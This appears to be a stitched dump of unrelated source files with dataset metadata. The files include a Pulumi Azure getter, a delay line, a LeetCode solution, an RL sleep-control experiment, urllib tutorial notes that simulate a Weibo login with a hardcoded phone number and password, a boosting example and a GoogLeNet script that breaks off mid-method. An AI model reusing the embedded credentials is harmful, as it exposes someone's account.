Swift Virtual Network Contract. This is used to enable the new Swift way of doing virtual network integration.
:param str name: Name of the app.
:param str resource_group_name: Name of the resource group to which the resource belongs.
:param str slot: Name of the deployment slot. If a slot is not specified, the API will get a gateway for the production slot's Virtual Network.
"""
__args__ = dict()
__args__['name'] = name
__args__['resourceGroupName'] = resource_group_name
__args__['slot'] = slot
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:web/v20181101:getWebAppSwiftVirtualNetworkConnectionSlot', __args__, opts=opts, typ=GetWebAppSwiftVirtualNetworkConnectionSlotResult).value
return AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult(
id=__ret__.id,
kind=__ret__.kind,
name=__ret__.name,
subnet_resource_id=__ret__.subnet_resource_id,
swift_supported=__ret__.swift_supported,
type=__ret__.type)
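# Minimal usage sketch (hypothetical resource names):
#
#   conn = get_web_app_swift_virtual_network_connection_slot(
#       name='my-app', resource_group_name='my-rg', slot='staging')
#   pulumi.export('subnetResourceId', conn.subnet_resource_id)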
|
[
"noreply@github.com"
] |
morrell.noreply@github.com
|
e2daa17da7418fb80cec9ab0745d804c304546ab
|
fee71dd79c16f8e4aa4be46aa25863a3e8539a51
|
/ear/core/delay.py
|
58999508e96ec84140b7be0b2066bb0c4deb9373
|
[
"BSD-3-Clause-Clear"
] |
permissive
|
ebu/ebu_adm_renderer
|
d004ed857b3004c9de336426f402654779a0eaf8
|
ef2189021203101eab323e1eccdd2527b32a5024
|
refs/heads/master
| 2023-08-09T09:13:06.626698
| 2022-12-07T12:22:39
| 2022-12-07T12:22:39
| 123,921,945
| 61
| 13
|
BSD-3-Clause-Clear
| 2023-08-30T17:17:05
| 2018-03-05T13:15:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,676
|
py
|
import numpy as np
class Delay(object):
"""Multi-channel delay line.
Parameters:
nchannels (int): number of channels to process
delay (int): number of samples to delay by
"""
def __init__(self, nchannels, delay):
assert delay >= 0
self.delaymem = np.zeros((delay, nchannels))
self.delay = delay
def process(self, input_samples):
"""Push n samples through the delay line.
Parameters:
input_samples (array of nsamples by nchannels): input samples
Returns:
array of nsamples by nchannels: output samples, delayed by delay
samples.
"""
output = np.zeros_like(input_samples)
# transfer samples from the delay memory followed by the input, to the
# output followed by the new delay memory, such that concat(src) before
# the transfer has the same value as concat(dst) after
src = [self.delaymem, input_samples]
dst = [output, self.delaymem]
# copy the common part of src[0] and dst[0]
start_len = min(len(src[0]), len(dst[0]))
if start_len: dst[0][:start_len] = src[0][:start_len]
# copy the part where src[0] overlaps dst[1] or src[1] overlaps dst[0]
overlap = len(src[0]) - len(dst[0])
if overlap > 0: # src[0] longer
dst[1][:overlap] = src[0][-overlap:]
elif overlap < 0: # dst[0] longer
dst[0][overlap:] = src[1][:-overlap]
# copy the common part of src[1] and dst[1]
end_len = min(len(src[1]), len(dst[1]))
if end_len: dst[1][-end_len:] = src[1][-end_len:]
return output
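# Minimal usage sketch (hypothetical values, kept as a comment so importing
# this module stays side-effect free):
#
#   d = Delay(nchannels=1, delay=2)
#   x = np.arange(4, dtype=float).reshape(4, 1)
#   d.process(x)  # -> [[0.], [0.], [0.], [1.]]; samples 2 and 3 stay in the memory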
|
[
"tom@tomn.co.uk"
] |
tom@tomn.co.uk
|
42803d5018e53b70b319b1d8fc3cfa2d380118f7
|
b8d2f095a4b7ea567ccc61ee318ba879318eec3d
|
/数组 Array/228. 汇总区间.py
|
2459ae5ea8ae5dd79af2263fa4cdbfdda2c61f89
|
[] |
no_license
|
f1amingo/leetcode-python
|
a3ef78727ae696fe2e94896258cfba1b7d58b1e3
|
b365ba85036e51f7a9e018767914ef22314a6780
|
refs/heads/master
| 2021-11-10T16:19:27.603342
| 2021-09-17T03:12:59
| 2021-09-17T03:12:59
| 205,813,698
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 971
|
py
|
from typing import List
class Solution:
def summaryRanges(self, nums: List[int]) -> List[str]:
if not nums:
return []
ans = []
lt, rt = nums[0], None
for i in range(len(nums) - 1):
if nums[i + 1] - nums[i] == 1:
                # note that 'if rt is None' and 'if not rt' are not equivalent (rt may be 0)
                if lt is None:
                    lt = nums[i]
                rt = nums[i + 1]
            else:
                ans.append(str(lt) + '->' + str(rt) if rt is not None else str(lt))
                lt, rt = nums[i + 1], None
        ans.append(str(lt) + '->' + str(rt) if rt is not None else str(lt))
return ans
assert Solution().summaryRanges([0]) == ['0']
assert Solution().summaryRanges([0, 1, 2, 4, 5, 7]) == ["0->2", "4->5", "7"]
assert Solution().summaryRanges([0, 2, 3, 4, 6, 8, 9]) == ["0", "2->4", "6", "8->9"]
assert Solution().summaryRanges([]) == []
assert Solution().summaryRanges([-1]) == ['-1']
|
[
"zsjperiod@foxmail.com"
] |
zsjperiod@foxmail.com
|
2ec9d717282626becf58a398a994ec197e90f564
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Kivy/python-for-android/pythonforandroid/recipes/ffpyplayer_codecs/__init__.py
|
599d8d30207ce572fac347c18e6677d753b80e58
|
[
"MIT"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:d196a4f300350342824820ae06ebac62968d8b22ad0fd350043b298a302af005
size 206
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
235d72234d9d44c9e16f8a005e6726574387a789
|
a689a72d3699883d7b58bd4ee3103373270bd0d5
|
/BOJ/Python/BOJ17135.py
|
5ecf7f7b4bd365d3f602a3d3ca99da2cd2830899
|
[] |
no_license
|
Oizys18/Algo
|
4670748c850dc9472b6cfb9f828a3ccad9c18981
|
45caafe22a8a8c9134e4ff3b227f5f0be94eefe7
|
refs/heads/master
| 2022-05-11T08:35:06.812539
| 2022-05-07T01:30:41
| 2022-05-07T01:30:41
| 202,690,024
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
# Castle Defense (BOJ 17135)
from pprint import pprint as pp
import collections
import itertools
import copy
N, M, D = map(int, input().split())
mat = [[*map(int, input().split())] for _ in range(N)] + [[0]*M]
archers = [0]*M
def isMap(x, y):
if 0 <= x < N + 2 and 0 <= y < M:
return True
else:
return False
def BFS(field, x, y):
visit = [[0]*M for _ in range(N+1)]
queue = []
queue.append((0, x, y))
while queue:
depth, x, y = queue.pop(0)
if depth > D:
continue
if not visit[x][y]:
visit[x][y] = 1
if field[x][y] == 1:
return (x, y)
for dx, dy in [(0, -1), (-1, 0), (0, 1)]:
nx = x + dx
ny = y + dy
if isMap(nx, ny):
queue.append((depth+1, nx, ny))
def fight():
kills = 0
field = collections.deque(copy.deepcopy(mat))
while True:
turnKill = set()
for x in range(N + 1):
for y in range(M):
if field[x][y] == 2:
killed = BFS(field, x, y)
if killed:
turnKill.add(killed)
for xt, yt in turnKill:
field[xt][yt] = 0
kills += 1
field.extendleft([[0]*M])
del field[N]
flag = 0
for a in range(N):
for b in range(M):
if field[a][b]:
flag = 1
if not flag:
return kills
res = 0
for chosen_archer in itertools.combinations(range(M), 3):
for ca in chosen_archer:
mat[N][ca] = 2
tactics = fight()
if res < tactics:
res = tactics
mat[N] = [0]*M
print(res)
|
[
"oizys18@gmail.com"
] |
oizys18@gmail.com
|
98f5a7d9ab4b3f578ce6948bda3f56af31438973
|
eb42558f56fdb41526cc31ac4ef3a6937bf39e96
|
/ConfigDefinitions/UserConfigs/SMHTT_2017_MCOnly_AntiIso_Configs_Deep/WConfig.py
|
c3c70830e40ca4f509cffad86bf361a53146d0bb
|
[] |
no_license
|
samhiggie/Jesterworks
|
6906b042d3e200efb9bd10b70284ccd30661aa53
|
562e8cbb20d7e4b1d5b9bdba3715578cc66f097d
|
refs/heads/master
| 2020-09-11T19:35:59.770456
| 2019-11-16T12:37:35
| 2019-11-16T12:37:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 967
|
py
|
from ConfigDefinitions.JesterworksConfigurations import JesterworksConfiguration as Config
from ConfigDefinitions.BranchAdditions.UserDefinedCollections.SMHTT_2017_MC_Data_Collection import MC_Data_Collection as BranchCollection
from ConfigDefinitions.CuttingDefinitions.UserCutConfigs.SMHTT2017Cuts_MC_AntiIso_wDeep import SMHTT2017Cuts as CutConfig
from ConfigDefinitions.EndActionDefinitions.UserConfigs.GrabHistograms import HistogramGrabber as HistogramGrabber
DataConfig = Config()
DataConfig.Path = "/data/ccaillol/smhmt2017_svfitted_12oct/"
DataConfig.Files = ["W.root","W1.root","W2.root","W3.root","W4.root"]
DataConfig.InputTreeName = "mutau_tree"
DataConfig.SampleName = "W"
DataConfig.OutputPath = "/data/aloeliger/SMHTT_Selected_2017_MCOnly_AntiIso_Deep/"
DataConfig.OutputFile = "W.root"
DataConfig.OutputTreeName = 'mt_Selected'
DataConfig.BranchCollection = BranchCollection
DataConfig.CutConfig = CutConfig
DataConfig.EndAction = HistogramGrabber
|
[
"aloelige@cern.ch"
] |
aloelige@cern.ch
|
109a0b28a419817d509d6d4ce27db19a8f90c3ad
|
235fcd12177715b51f26715befb7cb1909f27126
|
/sleep_control/experiments/arxiv/experiment_QNN_Jan31_2249_LSTM.py
|
ad1ee787afca6d41b7db4289cd35014ed9d60009
|
[] |
no_license
|
xiaogaogaoxiao/dqn4wirelesscontrol
|
1d165977f01e263735865e2b6daeed51c4288b01
|
68c2c485e64cef260c0dcb3975a88af4fae97283
|
refs/heads/master
| 2020-06-16T17:05:45.038089
| 2017-02-10T07:30:12
| 2017-02-10T07:30:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,160
|
py
|
# System built-in modules
import time
from datetime import datetime
import sys
import os
from multiprocessing import Pool
project_dir = "../../"
log_file_name = "msg_QNN_Jan31_2249_LSTM_{}.log".format(sys.argv[1])
sys.path.append(project_dir)
sys_stdout = sys.stdout
# Project dependency modules
import pandas as pd
pd.set_option('mode.chained_assignment', None) # block warnings due to DataFrame value assignment
import lasagne
# Project modules
from sleep_control.traffic_emulator import TrafficEmulator
from sleep_control.traffic_server import TrafficServer
from sleep_control.controller import QController, DummyController, NController
from sleep_control.integration import Emulation
from sleep_control.env_models import SJTUModel
from rl.qtable import QAgent
from rl.qnn_theano import QAgentNN
from rl.mixin import PhiMixin, DynaMixin
# Composite classes
class Phi_QAgentNN(PhiMixin, QAgentNN):
def __init__(self, **kwargs):
super(Phi_QAgentNN, self).__init__(**kwargs)
class Dyna_QAgent(DynaMixin, QAgent):
def __init__(self, **kwargs):
super(Dyna_QAgent, self).__init__(**kwargs)
class Dyna_QAgentNN(DynaMixin, QAgentNN):
def __init__(self, **kwargs):
super(Dyna_QAgentNN, self).__init__(**kwargs)
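# Composition via cooperative mixins: judging by the names, PhiMixin stacks
# the last phi_length observations into one state and DynaMixin adds
# model-based simulated backups on top of the base agent. Only Phi_QAgentNN
# is instantiated further down.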
# load from processed data
session_df = pd.read_csv(
filepath_or_buffer=project_dir+'/sleep_control/data/net_traffic_processed_dh3.dat',
parse_dates=['startTime_datetime', 'endTime_datetime', 'interArrivalDuration_datetime']
)
# Parameters
# |- Agent
# |- QAgent
actions = [(True, None), (False, 'serve_all')]
gamma, alpha = 0.9, 0.9 # TD backup
explore_strategy, epsilon = 'epsilon', 0.02 # exploration
# |- QAgentNN
# | - Phi
phi_length = 15
dim_state = (1, phi_length, 3+2)
range_state_slice = [(0, 10), (0, 10), (0, 10), (0, 1), (0, 1)]
range_state = [[range_state_slice]*phi_length]
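# range_state mirrors dim_state (1, phi_length, 3+2): one list of five
# (low, high) bounds per frame of the phi window, presumably used by
# QAgentNN to rescale its inputs.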
# | - No Phi
# phi_length = 0
# dim_state = (1, 1, 3)
# range_state = ((((0, 10), (0, 10), (0, 10)),),)
def f_build_net(input_var=None, input_shape=None, num_outputs=None):
if input_shape is None or num_outputs is None:
raise ValueError('State or Action dimension not given!')
l_in = lasagne.layers.InputLayer(shape=input_shape, input_var=input_var)
d1, d2, d3, d4 = input_shape
l_shp1 = lasagne.layers.ReshapeLayer(l_in, (-1, d3, d4))
l_lstm = lasagne.layers.LSTMLayer(l_shp1, num_units=500, grad_clipping=10, only_return_final=True, precompute_input=True)
l_shp2 = lasagne.layers.ReshapeLayer(l_lstm, (-1, 500))
l_out = lasagne.layers.DenseLayer(
l_shp2, num_units=num_outputs,
nonlinearity=lasagne.nonlinearities.tanh)
return l_out
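# Shape walk-through of f_build_net, assuming input (batch, 1, phi_length, 5):
#   reshape -> (batch, phi_length, 5)   a sequence of phi_length 5-dim frames
#   LSTM    -> (batch, 500)             only_return_final keeps the last step
#   dense   -> (batch, num_outputs)     one tanh-squashed value per action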
# | - Other params
momentum, learning_rate = 0.9, 0.01 # SGD
num_buffer, memory_size, batch_size, update_period, freeze_period = 2, 200, 100, 4, 16
reward_scaling, reward_scaling_update, rs_period = 1, 'adaptive', 32 # reward scaling
# |- Env model
model_type, traffic_window_size = 'IPP', 50
stride, n_iter, adjust_offset = 2, 3, 1e-22
eval_period, eval_len = 4, 100
n_belief_bins, max_queue_len = 100, 20
Rs, Rw, Rf, Co, Cw = 1.0, -1.0, -10.0, -5.0, -0.5
traffic_params = (model_type, traffic_window_size,
stride, n_iter, adjust_offset,
eval_period, eval_len,
n_belief_bins)
queue_params = (max_queue_len,)
beta = 0.5 # R = (1-beta)*ServiceReward + beta*Cost
reward_params = (Rs, Rw, Rf, Co, Cw, beta)
# |- DynaQ
num_sim = 5
# |- Env
# |- Time
start_time = pd.to_datetime("2014-10-15 09:40:00")
total_time = pd.Timedelta(days=7)
time_step = pd.Timedelta(seconds=2)
backoff_epochs = num_buffer*memory_size+phi_length
head_datetime = start_time - time_step*backoff_epochs
tail_datetime = head_datetime + total_time
TOTAL_EPOCHS = int(total_time/time_step)
# |- Reward
rewarding = {'serve': Rs, 'wait': Rw, 'fail': Rf}
te = TrafficEmulator(
session_df=session_df, time_step=time_step,
head_datetime=head_datetime, tail_datetime=tail_datetime,
rewarding=rewarding,
verbose=2)
ts = TrafficServer(cost=(Co, Cw), verbose=2)
env_model = SJTUModel(traffic_params, queue_params, reward_params, 2)
# agent = Dyna_QAgentNN(
# env_model=env_model, num_sim=num_sim,
agent = Phi_QAgentNN(
phi_length=phi_length,
dim_state=dim_state, range_state=range_state,
f_build_net = f_build_net,
batch_size=batch_size, learning_rate=learning_rate, momentum=momentum,
reward_scaling=reward_scaling, reward_scaling_update=reward_scaling_update, rs_period=rs_period,
update_period=update_period, freeze_period=freeze_period,
memory_size=memory_size, num_buffer=num_buffer,
# Below is QAgent params
actions=actions, alpha=alpha, gamma=gamma,
explore_strategy=explore_strategy, epsilon=epsilon,
verbose=2)
c = QController(agent=agent)
emu = Emulation(te=te, ts=ts, c=c, beta=beta)
# Heavy lifting
t = time.time()
sys.stdout = sys_stdout
log_path = project_dir + '/sleep_control/experiments/log/'
if os.path.isfile(log_path+log_file_name):
print "Log file {} already exist. Experiment cancelled.".format(log_file_name)
else:
log_file = open(log_path+log_file_name,"w")
print log_file_name + datetime.now().strftime(' [%Y-%m-%d %H:%M:%S] ') + '00%'
time.sleep(1)
sys.stdout = log_file
while emu.epoch is not None and emu.epoch<TOTAL_EPOCHS:
# log time
print "Epoch {},".format(emu.epoch),
left = emu.te.head_datetime + emu.te.epoch*emu.te.time_step
right = left + emu.te.time_step
print "{} - {}".format(left.strftime("%Y-%m-%d %H:%M:%S"), right.strftime("%Y-%m-%d %H:%M:%S"))
emu.step()
print
if emu.epoch%(0.1*TOTAL_EPOCHS)==0:
sys.stdout = sys_stdout
print log_file_name,
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S] ')+'{}0%'.format(10*emu.epoch/TOTAL_EPOCHS)
time.sleep(1)
sys.stdout = log_file
sys.stdout = sys_stdout
log_file.close()
print log_file_name,
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'),
print '{:.3f} sec,'.format(time.time()-t),
print '{:.3f} min'.format((time.time()-t)/60)
|
[
"liujingchu@gmail.com"
] |
liujingchu@gmail.com
|
8ff0c8e47e574a3a1e3a5c08bcb4cd992a48c23a
|
7fbf91c595f3adb67e29ab879a0b215581d260bf
|
/知识点/04-LiaoXueFeng-master/55-urllib.py
|
f613e42c3282f9ecbfdeb46685e8f672b48fb8c8
|
[] |
no_license
|
Randyedu/python
|
69947b3836e62d0081d92591ae2acd9a54eadb9a
|
5f9e7bec295ae05eadde0f661e7039c2bd08f725
|
refs/heads/master
| 2021-04-26T22:20:22.555128
| 2018-03-02T07:01:27
| 2018-03-02T07:01:27
| 124,074,741
| 1
| 0
| null | 2018-03-06T12:23:42
| 2018-03-06T12:23:42
| null |
UTF-8
|
Python
| false
| false
| 4,701
|
py
|
'''
urllib
urllib provides a set of functions for working with URLs.
What urllib offers is a way to perform all kinds of HTTP requests from a program. To make a request pass for a browser, it has to be disguised as one: first watch the requests a real browser sends, then copy its request headers; the User-Agent header is the one that identifies the browser.
'''
'''
GET
urllib's request module makes it very easy to fetch the content of a URL, i.e. send a GET request to a page and get back the HTTP response:
'''
'''
# Fetch a page and print the response:
from urllib import request
url = 'https://api.douban.com/v2/book/2129650'
with request.urlopen(url) as f:
data = f.read()
print('Status:', f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print(data.decode('utf-8'))
'''
print('---- Simulating a browser GET request ----')
'''
To imitate a browser sending a GET request, we need a Request object.
By adding HTTP headers to the Request object, the request can be disguised as coming from a browser.
For example, pretend to be an iPhone 6 requesting the Douban homepage:
'''
from urllib import request
'''
url = 'http://www.douban.com/'
req = request.Request(url)
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
with request.urlopen(req) as f:
print('status:',f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print(f.read().decode('utf-8'))
'''
print('---- Sending a request with POST ----')
'''
POST
To send a request with POST, just pass the parameters in as bytes via data.
'''
# Simulate a Weibo login: read the login email and password, then submit them encoded as username=xxx&password=xxx, the format weibo.cn's login page expects:
from urllib import request,parse
print('Login to weibo.cn...')
email = '18767162147'
passwd = '123456'
login_data = parse.urlencode([
('username',email),
('password',passwd),
('entry','mweibo'),
('client_id',''),
('savestate','1'),
('ec',''),
('pagerefer','https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F')
])
req = request.Request('https://passport.weibo.cn/sso/login')
req.add_header('Origin', 'https://passport.weibo.cn')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F')
with request.urlopen(req, data=login_data.encode('utf-8')) as f:
print('Status:',f.status,f.reason)
for k,v in f.getheaders():
print('%s:%s' % (k,v))
print('Data:',f.read().decode('utf-8'))
'''
Login to weibo.cn...
Status: 200 OK
Server:nginx/1.2.0
Date:Wed, 18 Nov 2015 01:17:48 GMT
Content-Type:text/html
Transfer-Encoding:chunked
Connection:close
Vary:Accept-Encoding
Cache-Control:no-cache, must-revalidate
Expires:Sat, 26 Jul 1997 05:00:00 GMT
Pragma:no-cache
Access-Control-Allow-Origin:https://passport.weibo.cn
Access-Control-Allow-Credentials:true
DPOOL_HEADER:dryad45
SINA-LB:aGEuOTAuZzEucXhnLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:ZGNjYTk0Y2UgMCAwIDAgNCA0ODAK
Successful login:
Data: {"retcode":20000000,"msg":"","data":{"loginresulturl":"https:\/\/passport.weibo.com\/sso\/crossdomain?entry=mweibo&action=login&proj=1&ticket=ST-MTk1NTAzMjcxNw%3D%3D-1447809422-gz-2C1D9275A244AFBEC6C3994B7615CBE0&display=0&cdurl=https%3A%2F%2Flogin.sina.com.cn%2Fsso%2Fcrossdomain%3Fentry%3Dmweibo%26action%3Dlogin%26proj%3D1%26ticket%3DST-MTk1NTAzMjcxNw%253D%253D-1447809422-gz-FE1989D8F7BC5227D9D27A1379670EF5%26display%3D0%26cdurl%3Dhttps%253A%252F%252Fpassport.sina.cn%252Fsso%252Fcrossdomain%253Fentry%253Dmweibo%2526action%253Dlogin%2526display%253D0%2526ticket%253DST-MTk1NTAzMjcxNw%25253D%25253D-1447809422-gz-057CDD10C8F2E7EB8E9797ADB86B4477","uid":"1955032717"}}
Failed login:
Data: {"retcode":50011002,"msg":"\u7528\u6237\u540d\u6216\u5bc6\u7801\u9519\u8bef","data":{"im":1,"username":"18767162147","errline":604}}
'''
'''
Handler
For more complex control, such as accessing a site through a proxy server, use a ProxyHandler.
'''
import urllib.request
proxy_handler = urllib.request.ProxyHandler({'http':'http://www.example.com:3128/'})
proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()
proxy_auth_handler.add_password('realm','host','username','password')
opener = urllib.request.build_opener(proxy_handler,proxy_auth_handler)
with opener.open('http://www.example.com/login.html') as f:
pass
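# Note: urllib.request.install_opener(opener) would make this opener the
# default for every subsequent urllib.request.urlopen() call in the process.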
|
[
"954950195@qq.com"
] |
954950195@qq.com
|
09ea107626a3b50a80e9b2624651b464bff260df
|
162e0e4791188bd44f6ce5225ff3b1f0b1aa0b0d
|
/examples/ensemble/plot_gradient_boosting_regularization.py
|
30116b2be102df536f491dab433fc757a2c46506
|
[] |
no_license
|
testsleeekGithub/trex
|
2af21fa95f9372f153dbe91941a93937480f4e2f
|
9d27a9b44d814ede3996a37365d63814214260ae
|
refs/heads/master
| 2020-08-01T11:47:43.926750
| 2019-11-06T06:47:19
| 2019-11-06T06:47:19
| 210,987,245
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,842
|
py
|
"""
================================
Gradient Boosting regularization
================================
Illustration of the effect of different regularization strategies
for Gradient Boosting. The example is taken from Hastie et al 2009 [1]_.
The loss function used is binomial deviance. Regularization via
shrinkage (``learning_rate < 1.0``) improves performance considerably.
In combination with shrinkage, stochastic gradient boosting
(``subsample < 1.0``) can produce more accurate models by reducing the
variance via bagging.
Subsampling without shrinkage usually does poorly.
Another strategy to reduce the variance is by subsampling the features
analogous to the random splits in Random Forests
(via the ``max_features`` parameter).
.. [1] T. Hastie, R. Tibshirani and J. Friedman, "Elements of Statistical
Learning Ed. 2", Springer, 2009.
"""
print(__doc__)
# Author: Peter Prettenhofer <peter.prettenhofer@gmail.com>
#
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from mrex import ensemble
from mrex import datasets
X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1)
X = X.astype(np.float32)
# map labels from {-1, 1} to {0, 1}
labels, y = np.unique(y, return_inverse=True)
X_train, X_test = X[:2000], X[2000:]
y_train, y_test = y[:2000], y[2000:]
original_params = {'n_estimators': 1000, 'max_leaf_nodes': 4, 'max_depth': None, 'random_state': 2,
'min_samples_split': 5}
plt.figure()
for label, color, setting in [('No shrinkage', 'orange',
{'learning_rate': 1.0, 'subsample': 1.0}),
('learning_rate=0.1', 'turquoise',
{'learning_rate': 0.1, 'subsample': 1.0}),
('subsample=0.5', 'blue',
{'learning_rate': 1.0, 'subsample': 0.5}),
('learning_rate=0.1, subsample=0.5', 'gray',
{'learning_rate': 0.1, 'subsample': 0.5}),
('learning_rate=0.1, max_features=2', 'magenta',
{'learning_rate': 0.1, 'max_features': 2})]:
params = dict(original_params)
params.update(setting)
clf = ensemble.GradientBoostingClassifier(**params)
clf.fit(X_train, y_train)
# compute test set deviance
test_deviance = np.zeros((params['n_estimators'],), dtype=np.float64)
for i, y_pred in enumerate(clf.staged_decision_function(X_test)):
# clf.loss_ assumes that y_test[i] in {0, 1}
test_deviance[i] = clf.loss_(y_test, y_pred)
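    # staged_decision_function yields the decision values after each boosting
    # iteration, so the full deviance-vs-iterations curve comes from a single
    # fitted model rather than refitting at every ensemble size.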
plt.plot((np.arange(test_deviance.shape[0]) + 1)[::5], test_deviance[::5],
'-', color=color, label=label)
plt.legend(loc='upper left')
plt.xlabel('Boosting Iterations')
plt.ylabel('Test Set Deviance')
plt.show()
|
[
"shkolanovaya@gmail.com"
] |
shkolanovaya@gmail.com
|
2c1206ff3140a312e6079a06ddf7380a15553501
|
009c1088e42cd50591946f736c30c0bad6db851b
|
/netmiko/ssh_exception.py
|
ad9e728ba282388faa4e5286d0a8f5df8748ee36
|
[
"MIT"
] |
permissive
|
hellt/netmiko
|
812501b0651db920ac07e09132651eee7bdd4794
|
f7ff5e6278acaecff7583518cc97bd945fceddc3
|
refs/heads/master
| 2021-01-18T12:45:01.751466
| 2016-11-18T23:30:44
| 2016-11-18T23:30:44
| 38,681,423
| 2
| 0
| null | 2015-07-07T10:44:21
| 2015-07-07T10:44:20
|
Python
|
UTF-8
|
Python
| false
| false
| 380
|
py
|
from paramiko.ssh_exception import SSHException
from paramiko.ssh_exception import AuthenticationException
class NetMikoTimeoutException(SSHException):
"""SSH session timed trying to connect to the device."""
pass
class NetMikoAuthenticationException(AuthenticationException):
"""SSH authentication exception based on Paramiko AuthenticationException."""
pass
|
[
"ktbyers@twb-tech.com"
] |
ktbyers@twb-tech.com
|
115a5f4de9b5a815764712b22925f2dff071cb0c
|
acef5161a1eeb107b116f9763114bb9f77d701b4
|
/pytorch/深度学习之PyTorch入门/廖星宇教程/14_googlenet.py
|
92ed042f6f1974bc2acbf433b857c3b0917fb789
|
[] |
no_license
|
lingxiao00/PyTorch_Tutorials
|
aadb68582edbaa093ab200724c670b36763156b7
|
285bcfb0c60860e47343485daeb54947cd715f97
|
refs/heads/master
| 2021-10-20T16:56:21.275740
| 2019-03-01T02:46:42
| 2019-03-01T02:46:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,188
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-12-25 09:07:53
# @Author : cdl (1217096231@qq.com)
# @Link : https://github.com/cdlwhm1217096231/python3_spider
# @Version : $Id$
import torch
import torchvision
import torch.nn.functional as F
from torch.autograd import Variable
from torchvision.datasets import CIFAR10
import torchvision.transforms as tfs
import numpy as np
from utils import train
import torch.nn as nn
import sys
sys.path.append("..")
"""inception模块"""
# 定义一个卷积和一个relu激活函数和一个batchnorm作为一个基本的层结构
def conv_relu(in_channel, out_channel, kernel, stride=1, padding=0):
layer = nn.Sequential(
nn.Conv2d(in_channel, out_channel, kernel, stride, padding),
nn.BatchNorm2d(out_channel, eps=1e-3),
nn.ReLU(True),
)
return layer
# The inception module
class inception(nn.Module):
def __init__(self, in_channel, out1_1, out2_1, out2_3, out3_1, out3_5, out4_1):
super(inception, self).__init__()
        # Branch 1: 1x1 convolution
self.branch1x1 = conv_relu(in_channel, out1_1, 1)
        # Branch 2: 1x1 convolution followed by 3x3 convolution
self.branch3x3 = nn.Sequential(
conv_relu(in_channel, out2_1, 1),
conv_relu(out2_1, out2_3, 3, padding=1)
)
        # Branch 3: 1x1 convolution followed by 5x5 convolution
self.branch5x5 = nn.Sequential(
conv_relu(in_channel, out3_1, 1),
conv_relu(out3_1, out3_5, 5, padding=2)
)
        # Branch 4: 3x3 max pooling followed by 1x1 convolution
self.branch_pool = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
conv_relu(in_channel, out4_1, 1)
)
def forward(self, x):
f1 = self.branch1x1(x)
f2 = self.branch3x3(x)
f3 = self.branch5x5(x)
f4 = self.branch_pool(x)
output = torch.cat((f1, f2, f3, f4), dim=1)
return output
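# All four branches preserve the spatial size, so concatenating on dim=1
# simply adds channels: out1_1 + out2_3 + out3_5 + out4_1. For the test
# instance below, inception(3, 64, 48, 64, 64, 96, 32) yields
# 64 + 64 + 96 + 32 = 256 output channels.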
test_net = inception(3, 64, 48, 64, 64, 96, 32)
test_x = Variable(torch.zeros(1, 3, 96, 96))
print('input shape: {} x {} x {}'.format(
test_x.shape[1], test_x.shape[2], test_x.shape[3]))
test_y = test_net(test_x)
print('output shape: {} x {} x {}'.format(
test_y.shape[1], test_y.shape[2], test_y.shape[3]))
# Define the GoogLeNet network
class googlenet(nn.Module):
def __init__(self, in_channel, num_classes, verbose=False):
super(googlenet, self).__init__()
self.verbose = verbose
self.block1 = nn.Sequential(
conv_relu(in_channel, out_channel=64,
kernel=7, stride=2, padding=3),
nn.MaxPool2d(3, 2)
)
self.block2 = nn.Sequential(
conv_relu(64, 64, kernel=1),
conv_relu(64, 192, kernel=3, padding=1),
nn.MaxPool2d(3, 2)
)
self.block3 = nn.Sequential(
inception(192, 64, 96, 128, 16, 32, 32),
inception(256, 128, 128, 192, 32, 96, 64),
nn.MaxPool2d(3, 2)
)
self.block4 = nn.Sequential(
inception(480, 192, 96, 208, 16, 48, 64),
inception(512, 160, 112, 224, 24, 64, 64),
inception(512, 128, 128, 256, 24, 64, 64),
inception(512, 112, 144, 288, 32, 64, 64),
inception(528, 256, 160, 320, 32, 128, 128),
nn.MaxPool2d(3, 2)
)
self.block5 = nn.Sequential(
inception(832, 256, 160, 320, 32, 128, 128),
inception(832, 384, 182, 384, 48, 128, 128),
nn.AvgPool2d(2)
)
self.classifier = nn.Linear(1024, num_classes)
def forward(self, x):
